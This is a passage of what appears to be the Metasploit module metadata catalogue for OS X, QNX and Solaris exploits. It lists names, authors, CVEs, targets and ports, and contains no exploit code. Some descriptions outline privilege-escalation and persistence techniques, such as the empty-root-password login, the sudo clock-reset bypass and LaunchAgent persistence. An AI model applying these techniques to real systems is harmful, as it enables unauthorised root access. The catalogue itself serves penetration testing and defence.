"description": "This module provides a persistent boot payload by creating a plist entry\n in the current user's ~/Library/LaunchAgents directory. Whenever the user logs in,\n the LaunchAgent will be invoked and this dropped payload will run.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/local/persistence.rb",
"is_install_path": true,
"ref_name": "osx/local/persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/root_no_password": {
"name": "Mac OS X Root Privilege Escalation",
"full_name": "exploit/osx/local/root_no_password",
"rank": 600,
"disclosure_date": "2017-11-29",
"type": "exploit",
"author": [
"chethan177",
"lemiorhan",
"timwr"
],
"description": "This module exploits a serious flaw in macOS High Sierra.\n Any user can log in as user \"root\" with an empty password.",
"references": [
"CVE-2017-13872",
"URL-https://twitter.com/lemiorhan/status/935578694541770752",
"URL-https://news.ycombinator.com/item?id=15800676",
"URL-https://forums.developer.apple.com/thread/79235"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.13.1 High Sierra x64 (Native Payload)"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/osx/local/root_no_password.rb",
"is_install_path": true,
"ref_name": "osx/local/root_no_password",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/rootpipe": {
"name": "Apple OS X Rootpipe Privilege Escalation",
"full_name": "exploit/osx/local/rootpipe",
"rank": 500,
"disclosure_date": "2015-04-09",
"type": "exploit",
"author": [
"Emil Kvarnhammar",
"joev <joev@metasploit.com>",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a hidden backdoor API in Apple's Admin framework on\n Mac OS X to escalate privileges to root, dubbed \"Rootpipe.\"\n\n This module was tested on Yosemite 10.10.2 and should work on previous versions.\n\n The patch for this issue was not backported to older releases.\n\n Note: you must run this exploit as an admin user to escalate to root.",
"references": [
"CVE-2015-1130",
"OSVDB-114114",
"EDB-36692",
"URL-https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.9-10.10.2"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/osx/local/rootpipe.rb",
"is_install_path": true,
"ref_name": "osx/local/rootpipe",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/rootpipe_entitlements": {
"name": "Apple OS X Entitlements Rootpipe Privilege Escalation",
"full_name": "exploit/osx/local/rootpipe_entitlements",
"rank": 500,
"disclosure_date": "2015-07-01",
"type": "exploit",
"author": [
"Emil Kvarnhammar",
"joev <joev@metasploit.com>"
],
"description": "This module exploits the rootpipe vulnerability and bypasses Apple's initial\n fix for the issue by injecting code into a process with the 'admin.writeconfig'\n entitlement.",
"references": [
"CVE-2015-3673",
"URL-https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.9-10.10.3"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/osx/local/rootpipe_entitlements.rb",
"is_install_path": true,
"ref_name": "osx/local/rootpipe_entitlements",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/rsh_libmalloc": {
"name": "Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",
"full_name": "exploit/osx/local/rsh_libmalloc",
"rank": 300,
"disclosure_date": "2015-10-01",
"type": "exploit",
"author": [
"rebel",
"shandelman116"
],
"description": "This module writes to the sudoers file without root access by exploiting rsh and malloc log files.\n It makes sudo require no password, giving access to su even if root is disabled.\n It works on OS X 10.9.5 to 10.10.5 (patched on 10.11).",
"references": [
"EDB-38371",
"CVE-2015-5889"
],
"platform": "OSX,Python",
"arch": "x64, python",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.9.5-10.10.5"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/osx/local/rsh_libmalloc.rb",
"is_install_path": true,
"ref_name": "osx/local/rsh_libmalloc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/setuid_tunnelblick": {
"name": "Setuid Tunnelblick Privilege Escalation",
"full_name": "exploit/osx/local/setuid_tunnelblick",
"rank": 600,
"disclosure_date": "2012-08-11",
"type": "exploit",
"author": [
"Jason A. Donenfeld",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The\n vulnerability exists in the setuid openvpnstart, where an insufficient\n validation of path names allows execution of arbitrary shell scripts as root.\n This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099\n over Mac OS X 10.7.5.",
"references": [
"CVE-2012-3485",
"OSVDB-84706",
"EDB-20443",
"URL-http://blog.zx2c4.com/791"
],
"platform": "OSX",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Tunnelblick 3.2.8 / Mac OS X x86",
"Tunnelblick 3.2.8 / Mac OS X x64"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/osx/local/setuid_tunnelblick.rb",
"is_install_path": true,
"ref_name": "osx/local/setuid_tunnelblick",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/setuid_viscosity": {
"name": "Viscosity setuid-set ViscosityHelper Privilege Escalation",
"full_name": "exploit/osx/local/setuid_viscosity",
"rank": 600,
"disclosure_date": "2012-08-12",
"type": "exploit",
"author": [
"Jason A. Donenfeld",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The\n vulnerability exists in the setuid ViscosityHelper, where an insufficient\n validation of path names allows execution of arbitrary python code as root.\n This module has been tested successfully on Viscosity 1.4.1 over Mac OS X\n 10.7.5.",
"references": [
"CVE-2012-4284",
"OSVDB-84709",
"EDB-20485",
"URL-http://blog.zx2c4.com/791"
],
"platform": "OSX",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Viscosity 1.4.1 / Mac OS X x86",
"Viscosity 1.4.1 / Mac OS X x64"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/osx/local/setuid_viscosity.rb",
"is_install_path": true,
"ref_name": "osx/local/setuid_viscosity",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/sudo_password_bypass": {
"name": "Mac OS X Sudo Password Bypass",
"full_name": "exploit/osx/local/sudo_password_bypass",
"rank": 300,
"disclosure_date": "2013-02-28",
"type": "exploit",
"author": [
"Todd C. Miller",
"joev <joev@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module gains a session with root permissions on versions of OS X with\n sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4,\n and possibly lower versions.\n\n If your session belongs to a user with Administrative Privileges\n (the user is in the sudoers file and is in the \"admin group\"), and the\n user has ever run the \"sudo\" command, it is possible to become the super\n user by running `sudo -k` and then resetting the system clock to 01-01-1970.\n\n This module will fail silently if the user is not an admin, if the user has never\n run the sudo command, or if the admin has locked the Date/Time preferences.\n\n Note: If the user has locked the Date/Time preferences, requests to overwrite\n the system clock will be ignored, and the module will silently fail. However,\n if the \"Require an administrator password to access locked preferences\" setting\n is not enabled, the Date/Time preferences are often unlocked every time the admin\n logs in, so you can install persistence and wait for a chance later.",
"references": [
"CVE-2013-1775",
"OSVDB-90677",
"BID-58203",
"URL-http://www.sudo.ws/sudo/alerts/epoch_ticket.html"
],
"platform": "OSX",
"arch": "x86, x64, cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X x86 (Native Payload)",
"Mac OS X x64 (Native Payload)",
"CMD"
],
"mod_time": "2018-05-31 12:26:33 +0000",
"path": "/modules/exploits/osx/local/sudo_password_bypass.rb",
"is_install_path": true,
"ref_name": "osx/local/sudo_password_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/tpwn": {
"name": "Mac OS X \"tpwn\" Privilege Escalation",
"full_name": "exploit/osx/local/tpwn",
"rank": 300,
"disclosure_date": "2015-08-16",
"type": "exploit",
"author": [
"qwertyoruiop",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a null pointer dereference in XNU to escalate\n privileges to root.\n\n Tested on 10.10.4 and 10.10.5.",
"references": [
"URL-https://github.com/kpwn/tpwn"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.10.4-10.10.5"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/osx/local/tpwn.rb",
"is_install_path": true,
"ref_name": "osx/local/tpwn",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/vmware_bash_function_root": {
"name": "OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)",
"full_name": "exploit/osx/local/vmware_bash_function_root",
"rank": 300,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Stephane Chazelas",
"juken",
"joev <joev@metasploit.com>",
"mubix <mubix@hak5.org>"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets the VMWare Fusion\n application, allowing an unprivileged local user to get root access.",
"references": [
"CVE-2014-6271",
"CWE-94",
"OSVDB-112004",
"EDB-34765"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.9 Mavericks x64 (Native Payload)"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/osx/local/vmware_bash_function_root.rb",
"is_install_path": true,
"ref_name": "osx/local/vmware_bash_function_root",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"exploit_osx/mdns/upnp_location": {
"name": "Mac OS X mDNSResponder UPnP Location Overflow",
"full_name": "exploit/osx/mdns/upnp_location",
"rank": 200,
"disclosure_date": "2007-05-25",
"type": "exploit",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "This module exploits a buffer overflow that occurs when processing\n specially crafted requests sent to mDNSResponder. All Mac OS X systems\n between version 10.4 and 10.4.9 (without the 2007-005 patch) are\n affected.",
"references": [
"OSVDB-35142",
"CVE-2007-2386",
"BID-24144",
"URL-http://support.apple.com/kb/TA24732"
],
"platform": "OSX",
"arch": "",
"rport": 0,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"10.4.8 x86",
"10.4.0 PPC"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/mdns/upnp_location.rb",
"is_install_path": true,
"ref_name": "osx/mdns/upnp_location",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/misc/ufo_ai": {
"name": "UFO: Alien Invasion IRC Client Buffer Overflow",
"full_name": "exploit/osx/misc/ufo_ai",
"rank": 200,
"disclosure_date": "2009-10-28",
"type": "exploit",
"author": [
"Jason Geffner",
"dookie"
],
"description": "This module exploits a buffer overflow in the IRC client component\n of UFO: Alien Invasion 2.2.1.",
"references": [
"OSVDB-65689",
"EDB-14013"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.5.8 x86, UFOAI 2.2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/misc/ufo_ai.rb",
"is_install_path": true,
"ref_name": "osx/misc/ufo_ai",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/rtsp/quicktime_rtsp_content_type": {
"name": "MacOS X QuickTime RTSP Content-Type Overflow",
"full_name": "exploit/osx/rtsp/quicktime_rtsp_content_type",
"rank": 200,
"disclosure_date": "2007-11-23",
"type": "exploit",
"author": [
"unknown"
],
"description": "No module description",
"references": [
"CVE-2007-6166",
"OSVDB-40876",
"BID-26549"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0",
"Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1",
"Mac OS X 10.4.8 x86, QuickTime 7.1.3",
"Mac OS X 10.5.0 x86, QuickTime 7.2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb",
"is_install_path": true,
"ref_name": "osx/rtsp/quicktime_rtsp_content_type",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/samba/lsa_transnames_heap": {
"name": "Samba lsa_io_trans_names Heap Overflow",
"full_name": "exploit/osx/samba/lsa_transnames_heap",
"rank": 200,
"disclosure_date": "2007-05-14",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>",
"hdm <x@hdm.io>"
],
"description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon. This module uses szone_free() to overwrite\n the size() or free() pointer in the initial_malloc_zones structure.",
"references": [
"CVE-2007-2446",
"OSVDB-34699"
],
"platform": "OSX",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic",
"Mac OS X 10.4.x x86 Samba 3.0.10",
"Mac OS X 10.4.x PPC Samba 3.0.10",
"DEBUG"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/samba/lsa_transnames_heap.rb",
"is_install_path": true,
"ref_name": "osx/samba/lsa_transnames_heap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/samba/trans2open": {
"name": "Samba trans2open Overflow (Mac OS X PPC)",
"full_name": "exploit/osx/samba/trans2open",
"rank": 500,
"disclosure_date": "2003-04-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>"
],
"description": "This exploits the buffer overflow found in Samba versions\n 2.2.0 to 2.2.8. This particular module is capable of\n exploiting the bug on Mac OS X PowerPC systems.",
"references": [
"CVE-2003-0201",
"OSVDB-4469",
"BID-7294",
"URL-https://seclists.org/bugtraq/2003/Apr/103"
],
"platform": "OSX",
"arch": "ppc",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Samba 2.2.x - Bruteforce"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/osx/samba/trans2open.rb",
"is_install_path": true,
"ref_name": "osx/samba/trans2open",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_qnx/local/ifwatchd_priv_esc": {
"name": "ifwatchd Privilege Escalation",
"full_name": "exploit/qnx/local/ifwatchd_priv_esc",
"rank": 600,
"disclosure_date": "2014-03-10",
"type": "exploit",
"author": [
"cenobyte",
"Tim Brown",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on QNX 6.4.x and 6.5.x\n systems by exploiting the ifwatchd suid executable.\n\n ifwatchd allows users to specify scripts to execute using the '-A'\n command line argument; however, it does not drop privileges when\n executing user-supplied scripts, resulting in execution of arbitrary\n commands as root.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"references": [
"CVE-2014-2533",
"BID-66449",
"EDB-32153",
"URL-http://seclists.org/bugtraq/2014/Mar/66"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/qnx/local/ifwatchd_priv_esc.rb",
"is_install_path": true,
"ref_name": "qnx/local/ifwatchd_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_qnx/qconn/qconn_exec": {
"name": "QNX qconn Command Execution",
"full_name": "exploit/qnx/qconn/qconn_exec",
"rank": 600,
"disclosure_date": "2012-09-04",
"type": "exploit",
"author": [
"David Odell",
"Mor!p3r",
"bcoles <bcoles@gmail.com>"
],
"description": "This module uses the qconn daemon on QNX systems to gain a shell.\n\n The QNX qconn daemon does not require authentication and allows\n remote users to execute arbitrary operating system commands.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"references": [
"EDB-21520",
"URL-https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos",
"URL-http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html",
"URL-http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/qnx/qconn/qconn_exec.rb",
"is_install_path": true,
"ref_name": "qnx/qconn/qconn_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/dtspcd/heap_noir": {
"name": "Solaris dtspcd Heap Overflow",
"full_name": "exploit/solaris/dtspcd/heap_noir",
"rank": 500,
"disclosure_date": "2002-07-10",
"type": "exploit",
"author": [
"noir <noir@uberhax0r.net>",
"hdm <x@hdm.io>"
],
"description": "This is a port of noir's dtspcd exploit. This module should\n work against any vulnerable version of Solaris 8 (sparc).\n The original exploit code was published in the book\n Shellcoder's Handbook.",
"references": [
"CVE-2001-0803",
"OSVDB-4503",
"BID-3517",
"URL-http://www.cert.org/advisories/CA-2001-31.html",
"URL-http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip"
],
"platform": "Solaris",
"arch": "sparc",
"rport": 6112,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Solaris 8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/dtspcd/heap_noir.rb",
"is_install_path": true,
"ref_name": "solaris/dtspcd/heap_noir",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/local/extremeparr_dtappgather_priv_esc": {
"name": "Solaris 'EXTREMEPARR' dtappgather Privilege Escalation",
"full_name": "exploit/solaris/local/extremeparr_dtappgather_priv_esc",
"rank": 600,
"disclosure_date": "2017-04-24",
"type": "exploit",
"author": [
"Shadow Brokers",
"Hacker Fantastic",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in the\n `dtappgather` executable included with Common Desktop Environment (CDE)\n on unpatched Solaris systems prior to Solaris 10u11 which allows users\n to gain root privileges.\n\n dtappgather allows users to create a user-owned directory at any\n location on the filesystem using the `DTUSERSESSION` environment\n variable.\n\n This module creates a directory in `/usr/lib/locale`, writes a shared\n object to the directory, and runs the specified SUID binary with the\n shared object loaded using the `LC_TIME` environment variable.\n\n This module has been tested successfully on:\n\n Solaris 9u7 (09/04) (x86);\n Solaris 10u1 (01/06) (x86);\n Solaris 10u2 (06/06) (x86);\n Solaris 10u4 (08/07) (x86);\n Solaris 10u8 (10/09) (x86);\n Solaris 10u9 (09/10) (x86).",
"references": [
"BID-97774",
"CVE-2017-3622",
"EDB-41871",
"URL-https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh",
"URL-http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
],
"platform": "Solaris,Unix",
"arch": "x86, x64, sparc",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/solaris/local/extremeparr_dtappgather_priv_esc.rb",
"is_install_path": true,
"ref_name": "solaris/local/extremeparr_dtappgather_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"EXTREMEPARR"
]
}
},
"exploit_solaris/local/libnspr_nspr_log_file_priv_esc": {
"name": "Solaris libnspr NSPR_LOG_FILE Privilege Escalation",
"full_name": "exploit/solaris/local/libnspr_nspr_log_file_priv_esc",
"rank": 600,
"disclosure_date": "2006-10-11",
"type": "exploit",
"author": [
"iDefense",
"Marco Ivaldi",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an arbitrary file write vulnerability in the\n Netscape Portable Runtime library (libnspr) on unpatched Solaris systems\n prior to Solaris 10u3 which allows users to gain root privileges.\n\n libnspr versions prior to 4.6.3 allow users to specify a log file with\n the `NSPR_LOG_FILE` environment variable. The log file is created with\n the privileges of the running process, resulting in privilege escalation\n when used in combination with a SUID executable.\n\n This module writes a shared object to the trusted library directory\n `/usr/lib/secure` and runs the specified SUID binary with the shared\n object loaded using the `LD_LIBRARY_PATH` environment variable.\n\n This module has been tested successfully with libnspr version 4.5.1\n on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).",
"references": [
"BID-20471",
"CVE-2006-4842",
"EDB-2543",
"EDB-2569",
"EDB-2641",
"URL-https://securitytracker.com/id/1017050",
"URL-https://securitytracker.com/id/1017051",
"URL-https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR",
"URL-http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418",
"URL-http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1"
],
"platform": "Solaris",
"arch": "x86, x64, sparc",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/solaris/local/libnspr_nspr_log_file_priv_esc.rb",
"is_install_path": true,
"ref_name": "solaris/local/libnspr_nspr_log_file_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/local/rsh_stack_clash_priv_esc": {
"name": "Solaris RSH Stack Clash Privilege Escalation",
"full_name": "exploit/solaris/local/rsh_stack_clash_priv_esc",
"rank": 400,
"disclosure_date": "2017-06-19",
"type": "exploit",
"author": [
"Qualys Corporation",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in RSH on unpatched Solaris\n systems which allows users to gain root privileges.\n\n The stack guard page on unpatched Solaris systems is of\n insufficient size to prevent collisions between the stack\n and heap memory, aka Stack Clash.\n\n This module uploads and executes Qualys' Solaris_rsh.c exploit,\n which exploits a vulnerability in RSH to bypass the stack guard\n page to write to the stack and create a SUID root shell.\n\n This module has offsets for Solaris versions 11.1 (x86) and\n Solaris 11.3 (x86).\n\n Exploitation will usually complete within a few minutes using\n the default number of worker threads (10). Occasionally,\n exploitation will fail. If the target system is vulnerable,\n usually re-running the exploit will be successful.\n\n This module has been tested successfully on Solaris 11.1 (x86)\n and Solaris 11.3 (x86).",
"references": [
"BID-99151",
"BID-99153",
"CVE-2017-1000364",
"CVE-2017-3629",
"CVE-2017-3630",
"CVE-2017-3631",
"EDB-42270",
"URL-http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-3629-3757403.html",
"URL-https://blog.qualys.com/securitylabs/2017/06/19/the-stack-clash",
"URL-https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt"
],
"platform": "Unix",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Solaris 11.1",
"Solaris 11.3"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/solaris/local/rsh_stack_clash_priv_esc.rb",
"is_install_path": true,
"ref_name": "solaris/local/rsh_stack_clash_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Stack Clash",
"Solaris_rsh.c"
]
}
},
"exploit_solaris/lpd/sendmail_exec": {
"name": "Solaris LPD Command Execution",
"full_name": "exploit/solaris/lpd/sendmail_exec",
"rank": 600,
"disclosure_date": "2001-08-31",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"ddz <ddz@theta44.org>"
],
"description": "This module exploits an arbitrary command execution flaw in\n the in.lpd service shipped with all versions of Sun Solaris\n up to and including 8.0. This module uses a technique\n discovered by Dino Dai Zovi to exploit the flaw without\n needing to know the resolved name of the attacking system.",
"references": [
"CVE-2001-1583",
"OSVDB-15131",
"BID-3274"
],
"platform": "Solaris,Unix",
"arch": "cmd",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/lpd/sendmail_exec.rb",
"is_install_path": true,
"ref_name": "solaris/lpd/sendmail_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/samba/lsa_transnames_heap": {
"name": "Samba lsa_io_trans_names Heap Overflow",
"full_name": "exploit/solaris/samba/lsa_transnames_heap",
"rank": 200,
"disclosure_date": "2007-05-14",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>",
"hdm <x@hdm.io>"
],
"description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon. This module uses the TALLOC chunk overwrite\n method (credit Ramon and Adriano), which only works with Samba\n versions 3.0.21-3.0.24. Additionally, this module will not work\n when the Samba \"log level\" parameter is higher than \"2\".",
"references": [
"CVE-2007-2446",
"OSVDB-34699"
],
"platform": "Solaris",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Solaris 8/9/10 x86 Samba 3.0.21-3.0.24",
"Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24",
"DEBUG"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/samba/lsa_transnames_heap.rb",
"is_install_path": true,
"ref_name": "solaris/samba/lsa_transnames_heap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/samba/trans2open": {
"name": "Samba trans2open Overflow (Solaris SPARC)",
"full_name": "exploit/solaris/samba/trans2open",
"rank": 500,
"disclosure_date": "2003-04-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>"
],
"description": "This exploits the buffer overflow found in Samba versions\n 2.2.0 to 2.2.8. This particular module is capable of\n exploiting the flaw on Solaris SPARC systems that do not\n have the noexec stack option set. Big thanks to MC and\n valsmith for resolving a problem with the beta version of\n this module.",
"references": [
"CVE-2003-0201",
"OSVDB-4469",
"BID-7294",
"URL-https://seclists.org/bugtraq/2003/Apr/103"
],
"platform": "Solaris",
"arch": "",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce",
"Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/solaris/samba/trans2open.rb",
"is_install_path": true,
"ref_name": "solaris/samba/trans2open",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/sunrpc/sadmind_adm_build_path": {
"name": "Sun Solaris sadmind adm_build_path() Buffer Overflow",
"full_name": "exploit/solaris/sunrpc/sadmind_adm_build_path",
"rank": 500,
"disclosure_date": "2008-10-14",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a buffer overflow vulnerability in the adm_build_path()\n function of the sadmind daemon.\n\n The distributed system administration daemon (sadmind) is the daemon used by\n Solstice AdminSuite applications to perform distributed system administration\n operations.\n\n The sadmind daemon is started automatically by the inetd daemon whenever a\n request to invoke an operation is received. The sadmind daemon process\n continues to run for 15 minutes after the last request is completed, unless a\n different idle-time is specified with the -i command line option. The sadmind\n daemon may be started independently from the command line, for example, at\n system boot time. In this case, the -i option has no effect; sadmind continues\n to run, even if there are no active requests.",
"references": [
"CVE-2008-4556",
"OSVDB-49111",
"URL-http://risesecurity.org/advisories/RISE-2008001.txt"
],
"platform": "Solaris",
"arch": "x86",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Sun Solaris 9 x86 Brute Force",
"Sun Solaris 9 x86",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb",
"is_install_path": true,
"ref_name": "solaris/sunrpc/sadmind_adm_build_path",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/sunrpc/sadmind_exec": {
"name": "Solaris sadmind Command Execution",
"full_name": "exploit/solaris/sunrpc/sadmind_exec",
"rank": 600,
"disclosure_date": "2003-09-13",
"type": "exploit",
"author": [
"vlad902 <vlad902@gmail.com>",
"hdm <x@hdm.io>",
"cazz <bmc@shmoo.com>",
"midnitesnake"
],
"description": "This exploit targets a weakness in the default security\n settings of the sadmind RPC application. This server is\n installed and enabled by default on most versions of the\n Solaris operating system.\n\n Vulnerable systems include Solaris 2.7, 8, and 9.",
"references": [
